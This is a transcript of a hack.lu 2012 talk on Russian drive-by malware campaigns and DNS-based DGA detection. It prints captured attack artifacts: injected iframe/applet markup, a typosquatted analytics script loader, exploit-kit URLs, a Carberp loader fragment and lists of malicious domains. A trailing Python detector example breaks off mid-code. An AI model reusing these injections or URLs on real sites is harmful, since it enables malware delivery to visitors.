Hacklu2012 v07
Transcript of Hacklu2012 v07
![Page 1: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/1.jpg)
![Page 2: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/2.jpg)
CyberCrime 2012 As we know it - Trends, Monitoring, Real Time Detection
@fygrave @vbkropotov
Presented at hack.lu 2012
![Page 3: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/3.jpg)
3
agenda
● CyberCrime 2012: trends
● Malicious campaigns in 2012 (case studies)
● Evolving evasion techniques
● Automating detection in real time
● Conclusions
![Page 4: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/4.jpg)
4
About speakers
● We are from Russia.. kind of ;)
![Page 5: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/5.jpg)
5
Cybercrime 2012 trends
![Page 6: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/6.jpg)
6
Emerging attack vectors
● DbD (drive-by download) – old, still popular
  – High profile targets are getting compromised
● Email campaigns – getting bigger, mass mailings to users from compromised targets
● Social Engineering attacks
● Mobile plays an active role
![Page 7: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/7.jpg)
7
Malicious Campaigns Sept 2011-Oct 2012
Case studies
![Page 8: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/8.jpg)
8
Autumn 2011: kp.ru, nation-wide newspaper?
● ~550 000 visitors per day
● Drive-By..
![Page 9: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/9.jpg)
9
![Page 10: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/10.jpg)
10
Autumn 2011: rzd.ru, National Railroads?
● ~200 000 visitors per day
● “Gimme a Malware!!”
![Page 11: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/11.jpg)
11
Yepp, rzd-rzd.ru as an intermediate
![Page 12: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/12.jpg)
12
![Page 13: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/13.jpg)
13
Just TWO domains, SURE?

| Domain | URL |
|---|---|
| interfax-rzd.in | http://interfax-rzd.in/news/buble.php?key=rtgddfg%26u=root |
| rzd-interfax-online.in | http://rzd-interfax-online.in/rzd-news/buble.php?key=rtgddfg%26u=root |
| news-rzdstyle.in | http://news-rzdstyle.in/new-mail/buble.php?key=rtgddfg%26u=root |
| rzd-rzd.in | http://rzd-rzd.in/rzd5/buble.php?key=rtgddfg%26u=root |
| therzd-rzd.in | http://therzd-rzd.in/rzd5/buble.php?key=rtgddfg%26u=root |
| rzd-rzdcomp.in | http://rzd-rzdcomp.in/rzd5/buble.php?key=rtgddfg%26u=root |
| rzd-rzdcomp.in | http://rzd-rzdcomp.in/rzd5/exe.php?exp=newjava%26key=rtgddfg%26u=root |
| rzd-rzdcomp.in | http://rzd-rzdcomp.in/rzd5/exe.php?exp=newjava%26key=rtgddfg%26u=root;1 |
| press-rzd.in | http://press-rzd.in/rzd/buble.php?key=rtgddfg%26u=root |
| rzd-press.in | http://rzd-press.in/rzd/buble.php?key=rtgddfg%26u=root |
| rzd-banner.in | http://rzd-banner.in/rzd/buble.php?key=rtgddfg%26u=root |
| pass-rzd.in | http://pass-rzd.in/rzd/buble.php?key=rtgddfg%26u=root |
| rzd-ticket.in | http://rzd-ticket.in/zd/buble.php?key=rtgddfg%26u=root |
![Page 14: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/14.jpg)
14
Campaign
![Page 15: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/15.jpg)
15
Similar style detected domains
![Page 16: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/16.jpg)
16
Klerk.ru
● Finance related portal
● ~150 000 visitors per day
![Page 17: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/17.jpg)
17
“fileless” bot campaign 2011 – Oct 2012
● Version 1 (detected) Nov 2011
● Version 2 (detected) Feb-Mar 2012
● Version 3 (detected) May 2012
● Version 4 (detected) first seen in Aug 2012, last detected in Oct 2012 (distributed via infected banner networks too)
![Page 18: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/18.jpg)
18
glavbukh.ru (Chief Accountant), ~45 000 targeted visitors per day

| Date detected | IP | Domain | URL | Domain created | Referrer |
|---|---|---|---|---|---|
| 09/Nov/2011 | 176.9.50.178 | jya56yhsvcsss.com | /BVRQ | 08/Nov/2011 | glavbukh.ru |
| 11/Nov/2011 | 176.9.50.178 | ha526ugfsfh.com | /BVRQ | 11/Nov/2011 | glavbukh.ru |
| 06/Feb/2012 | 66.199.232.98 | zcxrwuj4b.eu | /GLMF | 26/Jan/2012 | glavbukh.ru |
| 13/Feb/2012 | 66.199.232.9 | zaurona.eu | /GLMF | 08/Feb/2012 | glavbukh.ru |
| 20/Apr/2012 | 64.20.35.194 | vuyrtyal.info | /RK85 | 04/Apr/2012 | glavbukh.ru |
| 03/May/2012 | 64.20.35.194 | hortezam.info | /RK85 | 24/Apr/2012 | glavbukh.ru |
![Page 19: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/19.jpg)
19
glavbukh.ru, tks.ru, etc. May 2012 (bot check-in parameters as captured on the wire)

```
:arg hl=us&source=hp&q=-1785331712&aq=f&aqi=&aql=&oq=
:field Adobe Flash Player 11 ActiveX|1.Conexant 20585 SmartAudio HD|3.ThinkPad Modem Adapter|7.Security Update for Windows XP (KB2079403)|1.Security Update for Windows XP (KB2115168)|1.Security Update for Windows XP (KB2229593)|1.Security Update for Windows
```
![Page 20: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/20.jpg)
20
Drive-by newsru.com ver. Sept 2012
Domains on Sep 11 2012
![Page 21: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/21.jpg)
21
Permanent fails, fileless bot campaign 2011 – Oct 2012
● Finance related portal
● ~130 000 visitors per day

Injected markup as seen on the compromised page (hidden 1x1 div carrying the exploit applet):

```html
<iframe src="http://riflepick.net/7GIC"><html lang="en" dir="ltr"><head><body class="normal" cosmic="force" onload="netti()" style="background: #fff; font-face: sans-serif"><div id="duquiddiv"></div><a class="motivator" name="top"></a><div style="display:block;width:1px;height:1px;overflow:hidden;">
<applet archive="/07GICjq" code="Applet.class">
```

Sep 17 2012: echo.msk.ru, ~440 000 visitors per day
![Page 22: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/22.jpg)
22
Permanent fails, fileless bot campaign 2011 – Oct 2012

```html
<iframe src="http://riflepick.net/7GIC"><html lang="en" dir="ltr"><head><body class="normal" cosmic="force" onload="netti()" style="background: #fff; font-face: sans-serif"><div id="duquiddiv"></div><a class="motivator" name="top"></a><div style="display:block;width:1px;height:1px;overflow:hidden;"><applet archive="/07GICjq" code="Applet.class">
```

Sep 17 2012: banner network adfox.ru affected
![Page 23: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/23.jpg)
23
Campaign participants: examples

| Domain | Resource type | When seen | Unique hosts per day |
|---|---|---|---|
| Vesti.ru | TV news | Autumn 2012 | ~930 000 |
| gazeta.ru | news | Winter 2012 – Autumn 2012 | ~490 000 |
| newsru.com | news | Spring 2012 – Autumn 2012 | ~470 000 |
| echo.msk.ru | radio | Autumn 2012 | ~440 000 |
| 3DNews.ru | news | Summer 2012 – Autumn 2012 | ~180 000 |
| inosmi.ru | news | Autumn 2011 – Summer 2012 | 115 000 |
| glavbukh.ru | Accountants | Winter 2012 – Spring 2012 | ~45 000 |
| tks.ru | Finance (Import/Export) | Winter 2012 – Autumn 2012 | ~23 000 |
![Page 24: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/24.jpg)
24
Mobile scam
http://codbanners.ru
![Page 25: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/25.jpg)
25
Mobile scams
● Fake apps are still big
● Android apps available :)
![Page 26: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/26.jpg)
26
![Page 27: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/27.jpg)
27
• Legal
• Faked
Another news site, another phone…
![Page 28: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/28.jpg)
28
![Page 29: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/29.jpg)
29
Evolution of Counter-Detection and Evasion Techniques
![Page 30: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/30.jpg)
31
Malware hosting locations: interesting examples
Countries, hosters and a slide with a VPN “#epicfail” in the configuration.
Samples hosted in a gov.ua range and in the Ogni Moskvy bank range
![Page 31: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/31.jpg)
32
Drive By from a bank IP range

```
Date/Time               2011-11-25 15:45:27 MSK
Tag Name                Java_Possibly_Malicious_Applet
server                  1541897761
URL                     /dfbgeskdfa/Gmail.class
Packet DestinationAddress 10.X.X.X
Packet DestinationPort  42642
Packet SourceAddress    91.231.126.33
Packet SourcePort       80
```

```
netnum:        91.231.126.0 - 91.231.126.255
netname:       ognm
organisation:  ORG-LCM2-RIPE
org-name:      LTD CB "OGNI MOSKVY"
address:       27 st. New Basmannaya
address:       105066, Moscow,
address:       Russia
e-mail:        [email protected]
phone:         +7 495 7805181
```

Gmail.class - Exploit:Java/CVE-2010-0840
![Page 32: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/32.jpg)
33
Drive By from the State Land Cadastral Center at the State Agency of Land Resources of Ukraine range

```
Date/Time               2011-11-13 11:34:08 MSK
Tag Name                Java_Possibly_Malicious_Applet
server                  1539495587
URL                     /Gmail.class
Packet DestinationAddress 10.X.X.X
Packet DestinationPort  40487
Packet SourceAddress    91.194.214.163
Packet SourcePort       80
```

```
netnum:        91.194.214.0 - 91.194.215.255
netname:       SLCC
descr:         State Land Cadastral Center at the State Agency of Land Resources of Ukraine
country:       UA
organisation:  ORG-SLCC1-RIPE
address:       3 Narodnogo Opolchenya street, Kiev, Ukraine
```

Gmail.class - Exploit:Java/CVE-2010-0840
![Page 33: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/33.jpg)
34
Back end epic fail, Mar 13 2011: VPN address 95.163.66.197, real address 91.194.214.71
Exploit pack in the UA State Agency of Land Resources IP range still alive
![Page 34: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/34.jpg)
35
Not typical (now typical :-) attacks: examples
- Attacks using stolen/misconfigured DNS accounts
- Attacks that require real-user interaction
- Intermediate hostnames similar to the hacked hostnames (to make manual analysis troublesome?)
- Drive-by “FTP” types of attacks
![Page 35: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/35.jpg)
36
Stolen domains example (proxy log: time, URL, IP):

```
24/Jan/2012:18:59:54 GET http://csrv2.fatdiary.org/main.php?page=7a5a09bea4d91836 146.185.242.69
24/Jan/2012:19:00:18 GET http://csrv2.fatdiary.org/content/field.swf HTTP/1.0 146.185.242.69
25/Jan/2012:09:36:31 GET http://csrv15.amurt.org.uk/main.php?page=7a5a09bea4d91836 146.185.242.69
25/Jan/2012:09:36:33 GET http://csrv15.amurt.org.uk/content/fdp2.php?f=17 146.185.242.69
25/Jan/2012:09:36:44 GET http://csrv15.amurt.org.uk/content/field.swf 146.185.242.69
25/Jan/2012:09:36:45 GET http://csrv15.amurt.org.uk/content/v1.jar 146.185.242.69
25/Jan/2012:09:36:48 GET http://csrv15.amurt.org.uk/w.php?f=17%26e=0 146.185.242.69
26/Jan/2012:07:28:05 GET http://csrv23.UIUIopenvrml.org/main.php?page=7a5a09bea4d91836 146.185.242.69
31/Jan/2012:10:27:35 GET http://csrv24.air-bagan.org/main.php?page=7a5a09bea4d91836 146.185.242.79
31/Jan/2012:10:27:47 GET http://csrv24.air-bagan.org/content/rino.jar 146.185.242.79
31/Jan/2012:18:18:51 GET http://csrv35.air-bagan.org/main.php?page=7a5a09bea4d91836 146.185.242.79
31/Jan/2012:18:19:03 GET http://csrv35.air-bagan.org/getJavaInfo.jar 146.185.242.79
04/Feb/2012:12:02:51 GET http://csrv29.prawda2.info/main.php?page=7a5a09bea4d91836 146.185.242.79
06/Feb/2012:09:08:51 GET http://csrv89.prawda2.info/main.php?page=7a5a09bea4d91836 146.185.242.79
```
![Page 36: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/36.jpg)
37
WHAT'S COMMON

| Domain | IP | Registered / Created | Name server |
|---|---|---|---|
| amurt.org.uk | 46.227.202.68 | 15-Oct-1999 | ns1.afraid.org |
| air-bagan.org | 122.155.190.31 | 05-Aug-2006 | NS1.AFRAID.ORG |
| fatdiary.org | 71.237.151.22 | 17-Jul-2006 | NS1.AFRAID.ORG |
| prawda2.info | 91.192.39.83 | 18-Oct-2007 | NS1.AFRAID.ORG |
![Page 37: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/37.jpg)
38
Malware domain reputation and DNS account attacks
Starting from August 2012 we have been detecting a second wave of this campaign; be careful. Examples from Sep 2012 (parent domain and its IP, then the attacker-added subdomain and where it points):

```
alex01.net -> 46.39.237.81            >>> games.alex01.net -> 178.162.132.178
socceradventure.net -> 72.8.150.14    >>> mobilki.socceradventure.net -> 178.162.132.178
talleresnahuel.com -> 74.54.202.162   >>> kino.talleresnahuel.com -> 178.162.132.178
qultivator.se -> 72.8.150.15          >>> 597821.qultivator.se -> 178.162.132.166
```
![Page 38: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/38.jpg)
39
Carberp campaign Mar – May 2012 with tiny user interaction (the loader waits for a mouse move before acting; fragment as captured, elided on the slide):

```javascript
function() { var url = 'http://yyzola.gpbbsdhmjm.shacknet.nu/g/'; … document.onmousemove = function() {
…
```
![Page 39: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/39.jpg)
40
Hacked domains from the spring Carberp campaign, hoster rel-net.eu, 62.122.72.0 - 62.122.79.255
![Page 40: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/40.jpg)
41
Domains with interesting names
Intermediate domain names are often similar to the hacked domain name, or to a well known banner network or counter.
Spot the differences:
● google-analytics.com vs.
● google-analylics.com
● google-anatylics.com
![Page 41: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/41.jpg)
42
Trud.ru affected Feb 21 2012. The legitimate Google Analytics loader, followed by the injected copy that pulls ga.js from a typosquatted domain:

```html
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analitycs.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
```

```
Name: google-analytics.com       Addresses: 173.194.32.48
Name: www.google-analitycs.com   Address: 184.82.149.180
```
![Page 42: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/42.jpg)
43
Noproblemslove.com, whoismistergreen.com, etc...
● Bot infection: Drive-By-HTTP
● Payload and intermediate malware domains: normal / DynDNS
● Distributed via: compromised web-sites
● C&C domains: normal
● C&C and malware domains located on different ASes. Sophisticated attack scheme. Timeout before activity.
● Typical bot activity: mass HTTP POST
![Page 43: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/43.jpg)
44
Noproblemslove.com, whoismistergreen.com, etc...
![Page 44: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/44.jpg)
45
Interesting domains from the range 184.82.149.178-184.82.149.180 (Feb 2012)

| Domain name | IP |
|---|---|
| www.google-analylics.com | 184.82.149.179 |
| google-anatylics.com | 184.82.149.178 |
| www.google-analitycs.com | 184.82.149.180 |
| webmaster-google.ru | 184.82.149.178 |
| paged2.googlesyndlcation.com | 184.82.149.179 |
| googlefilter.ru | 184.82.149.179 |
| rambler-analytics.ru | 184.82.149.179 |
| site-yandex.net | 184.82.149.180 |
| www.yandex-analytics.ru | 184.82.149.178 |
| googles.4pu.com | 184.82.149.178 |
| googleapis.www1.biz | 184.82.149.178 |
| syn1-adriver.ru | 184.82.149.178 |
![Page 45: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/45.jpg)
46
C&C domains

whoismistergreen.com
IP address: 213.5.68.105
Created: 2011-07-26
Registrant Name: JOHN ABRAHAM
Address: ul. Dubois 119
City: Lodz

noproblemslove.com
IP address: 213.5.68.105
Created: 2011-12-07
Registrant Contact: Whois Privacy Protection Service, Whois Agent [email protected]

noproblemsbro.com
IP address: 176.65.166.28
Created: 2011-12-07
Registrant Contact: Whois Privacy Protection Service, Whois Agent [email protected]

patr1ckjane.com
IP was 176.65.166.28, IP now 213.5.68.105
Created: 2011-07-21
Registrant Name: patrick jane
Address: ul. Dubois 119
City: Lodz
![Page 46: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/46.jpg)
47
Not typical attacks via FTP
First seen 24/10/2011 11:28: ftp://1572572686/Main.class
Sample Mar 07: Java version used as the FTP password
![Page 47: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/47.jpg)
48
| Domain | URL | Referrer | Payload | Size |
|---|---|---|---|---|
| 3645455029 | /1/s.html | Infected site | html | 997 |
| Java.com | /js/deployJava.js | 3645455029 | javascript | 4923 |
| 3645455029 | /1/exp.jar | | application/x-jar | 18046 |
| 3645455029 | /file1.dat | | application/executable | 138352 |
![Page 48: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/48.jpg)
49
Attack analysis
- Script from www.java.com used during the attack
- Applet exp.jar loaded by FTP
- FTP server IP address obfuscated (written as a single decimal integer) to avoid detection
![Page 49: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/49.jpg)
50
Not Found?
![Page 50: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/50.jpg)
51
Interesting modifications

```
GET http://java.com/ru/download/windows_ie.jsp?host=java.com%26returnPage=ftp://217.73.58.181/1/s.html%26locale=ru HTTP/1.1
```

Key feature example (IDS event):

```
Date/Time            2012-04-20 11:11:49 MSD
Tag Name             FTP_Pass
Target IP Address    217.73.63.202
Target Object Name   21
:password Java1.6.0_30@
:user anonymous
```
![Page 51: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/51.jpg)
52
Registrar abuse (1)

```
gidzzkc.dogbookeoor-amtuzxo.org.         A 91.220.84.7
yqvdmbul.dogbookeoor-amtuzxo.org.        A 91.220.84.7
fncalzrmx.dogbookeoor-amtuzxo.org.       A 91.220.84.7
ghyyaweczb.dogbookeoor-amtuzxo.org.      A 91.220.84.7
vrmvneod.catxnahi-yarndfhh.info.         A 91.220.84.6
wrxpvxdudahlu.catxnahi-yarndfhh.info.    A 91.220.84.6
owcfudqqlgowwn.catxnahi-yarndfhh.info.   A 91.220.84.6
rskgwknaz.video-zgn-gqmbcax.info.        A 91.220.84.6
ahlcpdmssw.video-zgn-gqmbcax.info.       A 91.220.84.6
xrwxozkniqq.video-zgn-gqmbcax.info.      A 91.220.84.6
ighirfzcxdrii.video-zgn-gqmbcax.info.    A 91.220.84.6
```
![Page 52: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/52.jpg)
53
Registrar abuse (2)
● mlfskgdbwnfos.baseball-payed-mzigsy-voo.org 91.237.153.16
● onlkzxxlzbbgiy.payed-football-bciz-ydmslry.org 91.237.153.16
● Domains disappear without a trace within 30 minutes after use.
![Page 53: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/53.jpg)
54
Registrar abuse (3): referring page >>> throw-away hostname
● http://raisport.ru/contacts >>> xugamabpi.arraysort-qmppbkkn-abkn.org
● http://k62cg56m62.dyndns.info/js/vip.php?s=MSIE&n=8 >>> onlkzxxlzbbgiy.payed-football-bciz-ydmslry.org
● http://iked5gikr.ocry.com/do.php >>> fblcatagg.string-panelpvli-qbo-bmvf.org
![Page 54: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/54.jpg)
55
Legit domains are used as the referring hop too (11.09.2012):
http://out1.sudameris.com.ar/out >>> qehboobwkqvo.task-games-pta-vywcngn.org (91.237.153.24)
![Page 55: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/55.jpg)
56
What could be more flux than fastflux? ;-)
● WHOIS fastflux … HOW?!

```
Domain ID:D166393631-LROR
Domain Name:FOOTBALL-SECURITY-WETRLSGPIEO.ORG
Created On:21-Aug-2012 01:23:52 UTC
Last Updated On:21-Aug-2012 01:23:53 UTC
Expiration Date:21-Aug-2013 01:23:52 UTC
Sponsoring Registrar:Click Registrar, Inc. d/b/a publicdomainregistry.com (R1935-LROR)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Status:ADDPERIOD
Registrant ID:PP-SP-001
Registrant Name:Domain Admin
Registrant Organization:PrivacyProtect.org
Registrant Street1:ID#10760, PO Box 16
Registrant Street2:Note - All Postal Mails Rejected, visit Privacyprotect.org
Registrant Street3:
Registrant City:Nobby Beach
Registrant State/Province:
Registrant Postal Code:QLD 4218
Registrant Country:AU
Registrant Phone:+45.36946676
```
![Page 56: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/56.jpg)
57
Russian ASN (as5577)
![Page 57: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/57.jpg)
58
Intermediate ev2.ru, SpyEye Campaign
![Page 58: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/58.jpg)
59
Word distribution (length > 3) in domain names
![Page 59: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/59.jpg)
60
Incidents vs. time (CIRCL team informed)
![Page 60: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/60.jpg)
61
DEMO TIME: SHOW SOME VIDEOZ HERE :)
![Page 61: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/61.jpg)
62
Advanced bots: social network as C&C
![Page 62: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/62.jpg)
63
Evasion techniques: summary
- Evasion of automated detection of the compromised resource (via crawler)
- Evasion of automated detection of the compromised resource (via sandbox)
- Evasion techniques used in exploit serving mechanisms and malicious payloads
- Counter-analysis techniques (in infrastructure)
![Page 63: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/63.jpg)
64
Detection 2012
![Page 64: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/64.jpg)
65
Detecting DGA through DNS traffic
Input: DNS packets (passive DNS)
Output:
- list of active domains
- list of “could be active” domains
- list of “were active” domains
- IP addresses used by malicious infrastructure
![Page 65: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/65.jpg)
66
DGA pattern: How it looks on the wire
![Page 66: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/66.jpg)
67
Detecting DGA
● Simplified algorithm:
  – take domains with failed DNS lookups (rcode: 2, non-existent domain, or rcode: 3, domain name server failed)
  – group them by a similarity function f(x)
  – find domains with an even distribution
  – identify other domains matching the same similarity criteria f(x)
  – discover the relevant IP addresses
  – rinse and repeat :)
![Page 67: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/67.jpg)
68
Detection: related works
- M. Antonakakis, R. Perdisci, et al. From Throw-Away Traffic to Bots: Detecting the Rise of DGA-Based Malware. In Proceedings of USENIX Security, 2012.
- L. Bilge, E. Kirda, C. Kruegel, and M. Balduzzi. EXPOSURE: Finding Malicious Domains Using Passive DNS Analysis. In Proceedings of NDSS, 2011.
- etc..
![Page 68: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/68.jpg)
69
What we do differently:
● “lazy” WHOIS lookups, Team Cymru IP to ASN lookups
● Our own passive DNS index
● Sandbox farm (mainly to detect compromised websites automagically and study behavior)
![Page 69: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/69.jpg)
70
Architecture
![Page 70: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/70.jpg)
71
Sample analysis (step by step)
● Start looking for a failed pattern and cluster id:
![Page 71: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/71.jpg)
72
Sample analysis (two)
● Get the cluster ID: (eu_11_14)
Clustering is based on domain similarity. Currently used characteristics:
- f(zone, pattern (length, depth))
- additional characteristics (building up): natural language domain vs. generated string (occurrence of two-character sequences - n-grams)
- domain registration parameters (obtained via WHOIS [ problematic! ])
- cross-reference with the existing malicious IP and AS reputation database (incrementally built by us)
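A toy version of the "simplified algorithm" above and of the clustering characteristics just listed (zone, label length, depth, plus a bigram wordiness score and an evenness check), carried through to the "were active" domains, their IPs and the IP → domain transform. This is an added example written for this page, not the authors' dnslyzer code; the record format, the vocabulary and all sample names and IPs are constructed, and it uses the RFC 1035 RCODE numbering (3 = NXDOMAIN, 2 = SERVFAIL).

```python
"""Toy failed-lookup DGA detector over constructed passive-DNS records.
Added example, not the dnslyzer implementation; names and IPs are invented."""
from collections import Counter, defaultdict

NOERROR, SERVFAIL, NXDOMAIN = 0, 2, 3      # RFC 1035 RCODE values
MIN_NAMES, MIN_EVENNESS, MAX_WORDINESS = 3, 0.5, 0.2

# Tiny stand-in for a natural-language bigram model (constructed; a real
# deployment would train on a large corpus of legitimate domain labels).
WORDS = ("avatar maker mail news bank forum blog shop games video sport "
         "press ticket daily online banner analytics intranet corp www").split()
KNOWN_BIGRAMS = {w[i:i + 2] for w in WORDS for i in range(len(w) - 1)}

# Constructed passive-DNS records: (qname, rcode, answer_ip or None).
SAMPLE = (
    [(n + ".example.org", NXDOMAIN, None)                     # DGA-looking siblings
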